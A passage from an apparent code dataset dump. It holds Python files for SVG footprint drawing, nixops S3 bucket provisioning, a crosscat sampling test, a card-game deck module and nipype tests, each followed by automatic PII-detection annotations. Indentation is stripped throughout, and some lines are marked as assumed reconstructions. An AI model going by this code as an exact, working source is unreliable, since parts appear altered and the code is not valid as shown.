pathdata += 'M ' + '{},{}'.format(x*self.mmpx,y*self.mmpx)
first = False
elif(x == 'end'):
pathdata += ' z'
else:
pathdata += ' L ' + '{},{}'.format(x*self.mmpx,y*self.mmpx)
el.set('d', pathdata)
def gen_circle(self, layer_name, diameter, pos):
layer = self.svg.find('.//g[@id="{}"]'.format(layer_name))  # XPath pattern assumed, by analogy with the literal lookups above
if(layer_name == 'Courtyard'):
color = '#e63a81'
elif(layer_name == 'Silk'):
color = '#111111'
else:
color = '#000000'
circle = ET.SubElement(layer, 'circle')
circle.set('style', 'fill:{color};fill-opacity:1;stroke:none;stroke-width:0.0;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1'.format(color=color))
circle.set('cx', '{}'.format(pos[0]*self.mmpx))
circle.set('cy', '{}'.format(pos[1]*self.mmpx))
circle.set('r', '{}'.format(diameter/2*self.mmpx))
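# End-to-end sketch (hedged): sizes/positions are illustrative millimetre
# values, and skeleton.svg must provide the layer groups referenced above.
# svg = get_target()
# svg.add_package({'name': 'DEMO'})
# svg.add_pac_pad(type='smd', angle=0, size=(1.0, 0.6), pos=(0.0, 0.0), number=1)
# svg.add_pac_line(layer='Silk', width=0.15, vertices=[(-1.0, -1.0), (1.0, -1.0)])
# svg.output('demo.svg')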
if(__name__ == '__main__'):
target = get_target()
target.output('test.svg')
",4250,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'fout'], ['LOCATION', ""package['holes""], ['PERSON', 'pos\n\t\t\t}'], ['PERSON', 'top_layer = self.svg.find(\'.//g[@id=""Top'], ['PERSON', 'TODO'], ['PERSON', ""el.set('style""], ['PERSON', ""el.set('height""], ['PERSON', ""circle.set('cx""], ['PERSON', ""circle.set('r""], ['LOCATION', '000000'], ['PERSON', ""el.set('style""], ['NRP', '000000'], ['PERSON', ""circle.set('cx""], ['PERSON', ""circle.set('r""], ['URL', 'xml.et'], ['URL', 'self.sv'], ['URL', 'ET.pa'], ['URL', 'skeleton.sv'], ['URL', 'self.mm'], ['URL', 'self.sv'], ['URL', 'self.sv'], ['URL', 'ET.pa'], ['URL', 'skeleton.sv'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.sv'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.svg.fi'], ['URL', 'ET.Su'], ['URL', 'el.se'], ['URL', 'el.se'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'self.svg.fi'], ['URL', 'ET.Su'], ['URL', 'circle.se'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'self.svg.fi'], ['URL', 'email.com'], ['URL', 'ET.Su'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.svg.fi'], ['URL', 'email.com'], ['URL', 'ET.Su'], ['URL', 'circle.se'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'test.sv']]"
49,"# -*- coding: utf-8 -*-
# Automatic provisioning of AWS S3 buckets.
import time
import botocore
import boto3
import nixops.util
import nixops.resources
import nixops.ec2_utils
class S3BucketDefinition(nixops.resources.ResourceDefinition):
""""""Definition of an S3 bucket.""""""
@classmethod
def get_type(cls):
return ""s3-bucket""
@classmethod
def get_resource_type(cls):
return ""s3Buckets""
def __init__(self, xml, config={}):
nixops.resources.ResourceDefinition.__init__(self, xml, config)
# (the attrs/attr XPath patterns below are assumed from the standard nixops resource schema)
self.bucket_name = xml.find("attrs/attr[@name='name']/string").get("value")
self.region = xml.find("attrs/attr[@name='region']/string").get("value")
self.access_key_id = xml.find("attrs/attr[@name='accessKeyId']/string").get("value")
self.policy = xml.find("attrs/attr[@name='policy']/string").get("value")
self.website_enabled = self.config["website"]["enabled"]
self.website_suffix = self.config["website"]["suffix"]
self.website_error_document = self.config["website"]["errorDocument"]
def show_type(self):
return ""{0} [{1}]"".format(self.get_type(), self.region)
class S3BucketState(nixops.resources.ResourceState):
""""""State of an S3 bucket.""""""
state = nixops.util.attr_property(""state"", nixops.resources.ResourceState.MISSING, int)
bucket_name = nixops.util.attr_property(""ec2.bucketName"", None)
access_key_id = nixops.util.attr_property(""ec2.accessKeyId"", None)
region = nixops.util.attr_property(""ec2.region"", None)
@classmethod
def get_type(cls):
return ""s3-bucket""
def __init__(self, depl, name, id):
nixops.resources.ResourceState.__init__(self, depl, name, id)
self._conn = None
def show_type(self):
s = super(S3BucketState, self).show_type()
if self.region: s = ""{0} [{1}]"".format(s, self.region)
return s
@property
def resource_id(self):
return self.bucket_name
def get_definition_prefix(self):
return ""resources.s3Buckets.""
def connect(self):
if self._conn: return
(access_key_id, secret_access_key) = nixops.ec2_utils.fetch_aws_secret_key(self.access_key_id)
self._conn = boto3.session.Session(region_name=self.region if self.region != ""US"" else ""us-east-1"",
aws_access_key_id=access_key_id,
aws_secret_access_key=secret_access_key)
def create(self, defn, check, allow_reboot, allow_recreate):
self.access_key_id = defn.access_key_id or nixops.ec2_utils.get_access_key_id()
if not self.access_key_id:
raise Exception(""please set ‘accessKeyId’, $EC2_ACCESS_KEY or $AWS_ACCESS_KEY_ID"")
if len(defn.bucket_name) > 63:
raise Exception(""bucket name ‘{0}’ is longer than 63 characters."".format(defn.bucket_name))
self.connect()
s3client = self._conn.client('s3')
if check or self.state != self.UP:
self.log(""creating S3 bucket ‘{0}’..."".format(defn.bucket_name))
try:
ACL = 'private' # ..or: public-read, public-read-write, authenticated-read
s3loc = region_to_s3_location(defn.region)
if s3loc == ""US"":
s3client.create_bucket(ACL = ACL,
Bucket = defn.bucket_name)
else:
s3client.create_bucket(ACL = ACL,
Bucket = defn.bucket_name,
CreateBucketConfiguration = {
'LocationConstraint': s3loc
})
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != ""BucketAlreadyOwnedByYou"": raise
with self.depl._db:
self.state = self.UP
self.bucket_name = defn.bucket_name
self.region = defn.region
if defn.policy:
self.log(""setting S3 bucket policy on ‘{0}’..."".format(defn.bucket_name))
s3client.put_bucket_policy(Bucket = defn.bucket_name,
Policy = defn.policy.strip())
else:
try:
s3client.delete_bucket_policy(Bucket = defn.bucket_name)
except botocore.exceptions.ClientError as e:
# This seems not to happen - despite docs indicating it should:
# [http://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketDELETEpolicy.html]
if e.response['ResponseMetadata']['HTTPStatusCode'] != 204: raise # (204 : Bucket didn't have any policy to delete)
if not defn.website_enabled:
try:
s3client.delete_bucket_website(Bucket = defn.bucket_name)
except botocore.exceptions.ClientError as e:
if e.response['ResponseMetadata']['HTTPStatusCode'] != 204: raise
else:
website_config = { 'IndexDocument': { 'Suffix': defn.website_suffix } }
if defn.website_error_document != """":
website_config['ErrorDocument'] = { 'Key': defn.website_error_document}
s3client.put_bucket_website(Bucket = defn.bucket_name, WebsiteConfiguration = website_config)
def destroy(self, wipe=False):
if self.state == self.UP:
self.connect()
try:
self.log(""destroying S3 bucket ‘{0}’..."".format(self.bucket_name))
bucket = self._conn.resource('s3').Bucket(self.bucket_name)
try:
bucket.delete()
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != ""BucketNotEmpty"": raise
if not self.depl.logger.confirm(""are you sure you want to destroy S3 bucket ‘{0}’?"".format(self.bucket_name)): return False
bucket.objects.all().delete()
bucket.delete()
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != ""NoSuchBucket"": raise
return True
def region_to_s3_location(region):
# S3 location names are identical to EC2 regions, except for
# us-east-1 and eu-west-1.
if region == ""eu-west-1"": return ""EU""
elif region == ""us-east-1"": return ""US""
else: return region
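# e.g. region_to_s3_location("eu-west-1") -> "EU",
# region_to_s3_location("us-east-1") -> "US",
# region_to_s3_location("us-west-2") -> "us-west-2" (passed through unchanged)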
",6394,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'S3'], ['LOCATION', 'config='], ['PERSON', 'self.access_key_id = xml.find(dummy@email.com(""value'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.co'], ['LOCATION', 'US'], ['LOCATION', 'defn'], ['LOCATION', 'US'], ['URL', 's3client.de'], ['URL', 'botocore.exceptions.Cl'], ['LOCATION', 'US'], ['US_DRIVER_LICENSE', 'S3'], ['URL', 'http://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketDELETEpolicy.html]'], ['URL', 'nixops.re'], ['URL', 'nixops.ec'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.resources.Re'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.re'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.ac'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.ge'], ['URL', 'self.re'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.util.at'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.util.at'], ['URL', 'nixops.util.at'], ['URL', 'ec2.ac'], ['URL', 'nixops.util.at'], ['URL', 'ec2.re'], ['URL', 'nixops.resources.Re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'nixops.ec'], ['URL', 'self.ac'], ['URL', 'boto3.session.Se'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.ac'], ['URL', 'defn.ac'], ['URL', 'nixops.ec'], ['URL', 'utils.ge'], ['URL', 'self.ac'], ['URL', 'self.co'], ['URL', 'conn.cl'], ['URL', 'self.st'], ['URL', 'defn.re'], ['URL', 's3client.cr'], ['URL', 's3client.cr'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'self.de'], ['URL', 'self.st'], ['URL', 'self.re'], ['URL', 'defn.re'], ['URL', 'defn.policy.st'], ['URL', 's3client.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'e.re'], ['URL', 'self.st'], ['URL', 'self.co'], ['URL', 'conn.re'], ['URL', 'bucket.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'self.depl.logger.co'], ['URL', 'bucket.objects.al'], ['URL', 'bucket.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re']]"
50,"#
# Copyright (c) 2010-2014, MIT Probabilistic Computing Project
#
# Lead Developers: Dan Lovell and Jay Baxter
# Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka
# Research Leads: Vikash Mansinghka, Patrick Shafto
#
# Licensed under the Apache License, Version 2.0 (the ""License"");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an ""AS IS"" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import sys
from collections import Counter
#
import numpy
import pylab
pylab.ion()
pylab.show()
#
import crosscat.tests.plot_utils as pu
import crosscat.utils.file_utils as fu
import crosscat.utils.sample_utils as su
import crosscat.utils.api_utils as au
# parse some arguments
parser = argparse.ArgumentParser()
parser.add_argument('pkl_name', type=str)
parser.add_argument('--inf_seed', default=0, type=int)
parser.add_argument('--hostname', default='127.0.0.1', type=str)
args = parser.parse_args()
pkl_name = args.pkl_name
inf_seed = args.inf_seed
hostname = args.hostname
# FIXME: getting weird error on conversion to int: too large from inside pyx
def get_next_seed(max_val=32767): # sys.maxint):
return random_state.randint(max_val)
# resume from saved name
save_dict = fu.unpickle(pkl_name)
random_state = numpy.random.RandomState(inf_seed)
M_c = save_dict['M_c']
X_L = save_dict['X_L']
X_D = save_dict['X_D']
# FIXME: test constraints
# Y = [su.Bunch(index=2,value=2.3), su.Bunch(index=0,value=-4.)]
Y = None
# test simple_predictive_sample_observed
views_replicating_samples_params = su.determine_replicating_samples_params(X_L, X_D)
views_samples = []
for replicating_samples_params in views_replicating_samples_params:
this_view_samples = []
for replicating_sample_params in replicating_samples_params:
this_view_this_sample = su.simple_predictive_sample(
M_c, X_L, X_D, get_next_seed=get_next_seed, **replicating_sample_params)
this_view_samples.extend(this_view_this_sample)
views_samples.append(this_view_samples)
for view_idx, view_samples in enumerate(views_samples):
data_array = numpy.array(view_samples)
pu.plot_T(data_array)
pylab.title('simple_predictive_sample observed, view %s on local' % view_idx)
# test simple_predictive_sample_observed REMOTE
# hostname = 'ec2-23-22-208-4.compute-1.amazonaws.com'
URI = 'http://' + hostname + ':8007'
method_name = 'simple_predictive_sample'
#
views_samples = []
for replicating_samples_params in views_replicating_samples_params:
this_view_samples = []
for replicating_sample_params in replicating_samples_params:
args_dict = dict(
M_c=save_dict['M_c'],
X_L=save_dict['X_L'],
X_D=save_dict['X_D'],
Y=replicating_sample_params['Y'],
Q=replicating_sample_params['Q'],
n=replicating_sample_params['n'],
)
this_view_this_sample, id = au.call(
method_name, args_dict, URI)
print id
this_view_samples.extend(this_view_this_sample)
views_samples.append(this_view_samples)
for view_idx, view_samples in enumerate(views_samples):
data_array = numpy.array(view_samples)
pu.plot_T(data_array)
pylab.title('simple_predictive_sample observed, view %s on remote' % view_idx)
# test simple_predictive_sample_unobserved
observed_Q = views_replicating_samples_params[0][0]['Q']
Q = [(int(1E6), old_tuple[1]) for old_tuple in observed_Q]
new_row_samples = []
new_row_sample = su.simple_predictive_sample(
M_c, X_L, X_D, Y, Q, get_next_seed, n=1000)
new_row_samples.extend(new_row_sample)
new_row_samples = numpy.array(new_row_samples)
pu.plot_T(new_row_samples)
# once more with constraint
Y = [(int(1E6), 0, 100)]
new_row_sample = su.simple_predictive_sample(
M_c, X_L, X_D, Y, Q, get_next_seed, n=1)
# test impute
# imputed_value = su.impute(M_c, X_L, X_D, Y, [Q[3]], 100, get_next_seed)
",4283,"[['DATE_TIME', '2010-2014'], ['PERSON', 'Dan Lovell'], ['PERSON', 'Jay Baxter'], ['PERSON', 'Dan Lovell'], ['PERSON', 'Baxter Eaves'], ['PERSON', 'Jay Baxter'], ['PERSON', 'Vikash Mansinghka'], ['PERSON', 'Patrick Shafto'], ['LOCATION', 'crosscat.utils.sample_utils'], ['LOCATION', 'au'], ['PERSON', ""default='127.0.0.1""], ['PERSON', 'save_dict = fu.unpickle(pkl_name'], ['LOCATION', 'M_c'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['PERSON', 'new_row_samples'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'pylab.io'], ['URL', 'pylab.sh'], ['URL', 'crosscat.tests.pl'], ['URL', 'crosscat.utils.fi'], ['URL', 'crosscat.utils.sa'], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'args.pk'], ['URL', 'args.in'], ['URL', 'sys.ma'], ['URL', 'su.de'], ['URL', 'su.si'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'ec2-23-22-208-4.compute-1.amazonaws.com'], ['URL', 'au.ca'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'su.si'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'su.si'], ['URL', 'su.im']]"
51,"# -*- coding: utf-8 -*-
""""""
.. module:: deck
:synopsis: Encapsulates the behavior of card collections
.. moduleauthor:: Zach Mitchell dummy@email.com
""""""
from random import shuffle
from typing import List
from .cards import (
Card,
CardFaction,
CardEffect,
CardAction,
CardTarget
)
from .cardrepo import CardRepo
from .exceptions import (
RealmsException,
MainDeckEmpty,
PlayerDeckEmpty,
PlayerDeckInitSize,
PlayerDeckInitContents,
UUIDNotFoundError,
HandInitError
)
from collections import Counter
from typing import NamedTuple
CardList = List[Card]
EffectList = List[CardEffect]
FactionList = List[CardFaction]
EffectRecord = NamedTuple('EffectRecord', [
('target', CardTarget),
('action', CardAction),
('value', int),
('uuid', str),
('provider', str)])
class PlayerDeck(object):
""""""
Records the state of the player's deck
At any given point in time the player may have three piles of cards: undrawn cards, a
hand of cards, and a pile of used (discarded) cards. PlayerDeck records which cards are
in which pile, provides an interface from which a hand of cards can be assembled, and
shuffles the deck when necessary.
Parameters
----------
player_cards : List[Card]
The list of cards from which the player's starting deck will be constructed
Raises
------
PlayerDeckInitSize
Raised when constructing the deck with the wrong number of cards
PlayerDeckInitContents
Raised when constructing the deck with cards other than Vipers and Scouts
""""""
starting_size = 10
def __init__(self, player_cards: CardList):
try:
self._validate_deck_size(player_cards)
self._validate_deck_contents(player_cards)
except RealmsException:
raise
self._undrawn: CardList = player_cards
shuffle(self._undrawn) # shuffled in place
self._discards: CardList = []
@staticmethod
def _validate_deck_size(cards: CardList) -> None:
""""""Ensures that the starting deck contains the correct
number of cards
Parameters
----------
cards : CardList
The tentative starting deck
Raises
------
PlayerDeckInitSize
Raised if the tentative starting deck is not the correct size
""""""
if len(cards) != PlayerDeck.starting_size:
raise PlayerDeckInitSize(len(cards))
return
@staticmethod
def _validate_deck_contents(cards) -> None:
""""""Ensures that the tentative starting deck contains only Vipers and Scouts
Parameters
----------
cards : CardList
The tentative starting deck
Raises
------
PlayerDeckInitContents
Raised if the tentative starting deck contains cards other than Vipers or Scouts
""""""
for c in cards:
if (c.name != 'Viper') and (c.name != 'Scout'):
raise PlayerDeckInitContents(c.name)
return
def _next_card(self) -> Card:
""""""Produces the next card from the player's deck
Attempts to draw a card from the top of the undrawn pile. If
the undrawn pile is empty, the undrawn pile is replenished from
the discard pile and shuffled before attempting to draw a card again.
An attempt to draw a card from the undrawn pile while both the undrawn
pile and discard pile are empty will raise a ``PlayerDeckEmpty`` exception.
Returns
-------
Card
A card from the top of the undrawn pile
Raises
------
PlayerDeckEmpty
Raised when attempting to draw a card while both undrawn and discard
piles are empty
""""""
if len(self._undrawn) > 0:
return self._undrawn.pop()
elif len(self._discards) > 0:
self._refill_undrawn()
return self._undrawn.pop()
else:
raise PlayerDeckEmpty
@property
def cards_remaining(self) -> int:
""""""The total number of cards left in the undrawn and discard piles
Returns
-------
int
The number of cards left to draw from
""""""
return len(self._undrawn) + len(self._discards)
def _refill_undrawn(self) -> None:
""""""Refills the undrawn pile with cards from the discard pile
Note
----
The cards in the discard pile are shuffled before being placed
back into the undrawn pile
""""""
self._undrawn: CardList = self._discards
shuffle(self._undrawn) # shuffled in place
self._discards: CardList = []
return
def discard(self, card: Card) -> None:
""""""Sends the card to the discard pile
Parameters
----------
card : Card
The card to send to the discard pile
""""""
self._discards.append(card)
return
def draw(self, num=5) -> CardList:
""""""Draws the specified number of cards from the undrawn pile
Parameters
----------
num : int (Optional)
The number of cards to draw (Default is 5)
Returns
-------
List[Card]
The list of cards that were drawn
Raises
------
IndexError
Raised if no cards are left to draw, or the number of cards requested
is not a positive integer
Note
----
If there are cards remaining in the deck but there are fewer cards than
were requested, then as many cards as possible are returned.
""""""
if (num <= 0) or (self.cards_remaining == 0) or (not isinstance(num, int)):
raise IndexError
cards: CardList = []
for _ in range(num):
try:
cards.append(self._next_card())
except PlayerDeckEmpty:
break
return cards
def _scrap(self, card):
""""""
Permanently removes a card from the discard pile
""""""
pass
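# Usage sketch (hedged): the ten starting cards must all be Vipers/Scouts,
# so ``starting_cards`` is assumed to come from a CardRepo-style helper.
# deck = PlayerDeck(starting_cards)
# hand = deck.draw(5)        # five cards from the shuffled undrawn pile
# for card in hand:
#     deck.discard(card)     # played cards return via the discard pile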
class MainDeck(object):
""""""The deck from which players can acquire cards
Parameters
----------
cardrepo : CardRepo
The repository from which the cards are obtained
""""""
def __init__(self, cardrepo: CardRepo):
self._repo: CardRepo = cardrepo
self._cards: CardList = self._repo.main_deck_cards()
shuffle(self._cards)
return
def next_card(self) -> Card:
""""""Produces the next card from the main deck
Returns
-------
Card
A card from the top of the main deck
Raises
------
MainDeckEmpty
Raised when attempting to draw a card when the deck is empty
""""""
if len(self._cards) > 0:
return self._cards.pop()
else:
raise MainDeckEmpty
class TradeRow(object):
""""""Presents the cards that players may acquire
Parameters
----------
maindeck : MainDeck
The deck from which the trade row is drawn
cardrepo : CardRepo
The repository from which cards are obtained
""""""
def __init__(self, maindeck: MainDeck, cardrepo: CardRepo):
self._maindeck: MainDeck = maindeck
self._repo: CardRepo = cardrepo
self._explorer = None
self._cards = []
@property
def available(self) -> CardList:
""""""Produces the list of all cards available for purchase
Returns
-------
List[Card]
The list of cards available for purchase
""""""
return self.cards + [self.explorer]
@property
def cards(self) -> CardList:
""""""Produces the list of cards available for purchase
from the main deck
Returns
-------
List[Card]
The list of available cards from the main deck
""""""
while len(self._cards) < 5:
try:
card: Card = self._maindeck.next_card()
except MainDeckEmpty:
break
self._cards.append(card)
return self._cards
@property
def explorer(self) -> Card:
""""""Produces the current Explorer available for purchase
Returns
-------
Card
The current Explorer
""""""
if self._explorer is None:
self._explorer: Card = self._repo.new_explorer()
return self._explorer
def acquire(self, uuid: str) -> Card:
""""""Produces the card with the specified UUID
Parameters
----------
uuid : str
The UUID of the card the player wishes to acquire
Returns
-------
Card
The card with the specified UUID
Raises
------
UUIDNotFoundError
Raised when the UUID of the requested card is not found
in the list of available cards
""""""
cards_bools = [c.uuid == uuid for c in self.cards]
if True in cards_bools:
i = cards_bools.index(True)
return self._cards.pop(i)
elif self.explorer.uuid == uuid:
card = self._explorer
self._explorer = None
return card
else:
raise UUIDNotFoundError
def scrap(self, uuid: str) -> None:
""""""Permanently removes a card from the trade row
Parameters
----------
uuid : str
The UUID of the card to remove
""""""
cards_bools = [c.uuid == uuid for c in self.cards]
if True in cards_bools:
i = cards_bools.index(True)
del self._cards[i]
elif self.explorer.uuid == uuid:
self._explorer = None
else:
raise UUIDNotFoundError
return
class Hand(object):
""""""The player's hand of cards
A Hand is made from a list of cards drawn from the undrawn pile of the player's deck,
as well as any bases that were played previously and have not been destroyed.
The processing of cards into a collection of effects is a multi-step process:
1. The basic effects are pulled from each card
2. The factions are tallied up to see which cards may activate their ally abilities
3. Ally abilities are pulled from each card
4. The effects are aggregated by their action types
5. Effects are applied in whatever order the user chooses
6. If cards are drawn as the result of an action, the effects list is updated
Parameters
----------
to_draw : int
The number of cards to draw initially
existing_bases : List[Card]
Any bases that were played previously and have not yet been destroyed
playerdeck : PlayerDeck
The player's deck
""""""
def __init__(self, to_draw: int, existing_bases: CardList, playerdeck: PlayerDeck):
if (to_draw < 0) or (to_draw > 5):
raise HandInitError
try:
drawn: CardList = playerdeck.draw(to_draw)
except IndexError:
drawn: CardList = []
self.cards = drawn + existing_bases
self._playerdeck = playerdeck
return
@staticmethod
def _collect_basic_effects(cards: List[Card]) -> List[EffectRecord]:
""""""Assembles a list of `EffectRecord`s from the cards in the hand
""""""
basic_effects: List[EffectRecord] = []
for c in cards:
effects: List[CardEffect] = c.effects_basic
records = [EffectRecord(target=e.target,
action=e.action,
value=e.value,
uuid=e.uuid,
provider=c.uuid)
for e in effects]
basic_effects += records
return basic_effects  # accumulate across all cards, not just the last one
@staticmethod
def _collect_ally_factions(cards: List[Card]) -> List[CardFaction]:
""""""Assembles a list of factions that should have their ally abilities activated
""""""
factions: List[CardFaction] = [c.faction for c in cards]
if CardFaction.ALL in factions:
return [CardFaction.BLOB, CardFaction.STAR, CardFaction.FEDERATION, CardFaction.MACHINE]
counts = Counter(factions)
allies: List[CardFaction] = [key for key in counts.keys()
if counts[key] > 1 and key != CardFaction.UNALIGNED]
return allies
@staticmethod
def _collect_ally_effects(cards: List[Card], facs: List[CardFaction]) -> List[EffectRecord]:
""""""Assembles a list of the ally effects that are applicable
""""""
ally_effects: List[EffectRecord] = []
for c in cards:
effects: List[CardEffect] = c.effects_ally
records = [EffectRecord(target=e.target,
action=e.action,
value=e.value,
uuid=e.uuid,
provider=c.uuid)
for e in effects if c.faction in facs]
ally_effects += records
return ally_effects
def _collect_effects(self) -> List[EffectRecord]:
""""""Assembles a list of effects provided by the player's hand
""""""
basic_effects: List[EffectRecord] = Hand._collect_basic_effects(self.cards)
ally_factions: List[CardFaction] = Hand._collect_ally_factions(self.cards)
ally_effects: List[EffectRecord] = Hand._collect_ally_effects(self.cards, ally_factions)
return basic_effects + ally_effects
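# Sketch of the effect-collection pipeline described in the Hand docstring
# (hedged: the starting-deck helper on CardRepo is assumed):
# repo = CardRepo()
# deck = PlayerDeck(starting_cards)  # 10 Vipers/Scouts, source assumed
# hand = Hand(to_draw=5, existing_bases=[], playerdeck=deck)
# effects = hand._collect_effects()  # List[EffectRecord]: basic + ally effects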
",13773,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Zach Mitchell'], ['PERSON', 'EffectRecord'], ['PERSON', 'str'], ['PERSON', 'str'], ['PERSON', 'MainDeck = maindeck'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'PlayerDeck.st'], ['URL', 'c.na'], ['URL', 'c.na'], ['URL', 'c.na'], ['URL', 'self.ca'], ['URL', 'repo.ma'], ['URL', 'self.ca'], ['URL', 'maindeck.ne'], ['URL', 'repo.ne'], ['URL', 'self.ca'], ['URL', 'bools.in'], ['URL', 'self.ca'], ['URL', 'bools.in'], ['URL', 'self.ca'], ['URL', 'e.ac'], ['URL', 'e.va'], ['URL', 'CardFaction.AL'], ['URL', 'CardFaction.ST'], ['URL', 'CardFaction.MA'], ['URL', 'counts.ke'], ['URL', 'e.ac'], ['URL', 'e.va'], ['URL', 'self.ca'], ['URL', 'self.ca'], ['URL', 'self.ca']]"
52,"# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
from __future__ import print_function, unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import open, str, bytes
import os
import tempfile
import shutil
import warnings
import simplejson as json
from nipype.testing import (assert_equal, assert_not_equal, assert_raises,
assert_true, assert_false, with_setup, package_check,
skipif, example_data)
import nipype.interfaces.base as nib
from nipype.utils.filemanip import split_filename
from nipype.interfaces.base import Undefined, config
from traits.testing.nose_tools import skip
import traits.api as traits
def test_bunch():
b = nib.Bunch()
yield assert_equal, b.__dict__, {}
b = nib.Bunch(a=1, b=[2, 3])
yield assert_equal, b.__dict__, {'a': 1, 'b': [2, 3]}
def test_bunch_attribute():
b = nib.Bunch(a=1, b=[2, 3], c=None)
yield assert_equal, b.a, 1
yield assert_equal, b.b, [2, 3]
yield assert_equal, b.c, None
def test_bunch_repr():
b = nib.Bunch(b=2, c=3, a=dict(n=1, m=2))
yield assert_equal, repr(b), ""Bunch(a={'m': 2, 'n': 1}, b=2, c=3)""
def test_bunch_methods():
b = nib.Bunch(a=2)
b.update(a=3)
newb = b.dictcopy()
yield assert_equal, b.a, 3
yield assert_equal, b.get('a'), 3
yield assert_equal, b.get('badkey', 'otherthing'), 'otherthing'
yield assert_not_equal, b, newb
yield assert_equal, type(dict()), type(newb)
yield assert_equal, newb['a'], 3
def test_bunch_hash():
# NOTE: Since the path to the json file is included in the Bunch,
# the hash will be unique to each machine.
pth = os.path.split(os.path.abspath(__file__))[0]
json_pth = os.path.join(pth, 'realign_json.json')
b = nib.Bunch(infile=json_pth,
otherthing='blue',
yat=True)
newbdict, bhash = b._get_bunch_hash()
yield assert_equal, bhash, 'PI:KEY'
# Make sure the hash stored in the json file for `infile` is correct.
jshash = nib.md5()
with open(json_pth, 'r') as fp:
jshash.update(fp.read().encode('utf-8'))
yield assert_equal, newbdict['infile'][0][1], jshash.hexdigest()
yield assert_equal, newbdict['yat'], True
# create a temp file
# global tmp_infile, tmp_dir
# tmp_infile = None
# tmp_dir = None
def setup_file():
# global tmp_infile, tmp_dir
tmp_dir = tempfile.mkdtemp()
tmp_infile = os.path.join(tmp_dir, 'foo.txt')
with open(tmp_infile, 'w') as fp:
fp.writelines(['123456789'])
return tmp_infile
def teardown_file(tmp_dir):
shutil.rmtree(tmp_dir)
def test_TraitedSpec():
yield assert_true, nib.TraitedSpec().get_hashval()
yield assert_equal, nib.TraitedSpec().__repr__(), '\n\n'
class spec(nib.TraitedSpec):
foo = nib.traits.Int
goo = nib.traits.Float(usedefault=True)
yield assert_equal, spec().foo, Undefined
yield assert_equal, spec().goo, 0.0
specfunc = lambda x: spec(hoo=x)
yield assert_raises, nib.traits.TraitError, specfunc, 1
infields = spec(foo=1)
hashval = ([('foo', 1), ('goo', '0.0000000000')], 'PI:KEY')
yield assert_equal, infields.get_hashval(), hashval
# yield assert_equal, infields.hashval[1], hashval[1]
yield assert_equal, infields.__repr__(), '\nfoo = 1\ngoo = 0.0\n'
@skip
def test_TraitedSpec_dynamic():
from pickle import dumps, loads
a = nib.BaseTraitedSpec()
a.add_trait('foo', nib.traits.Int)
a.foo = 1
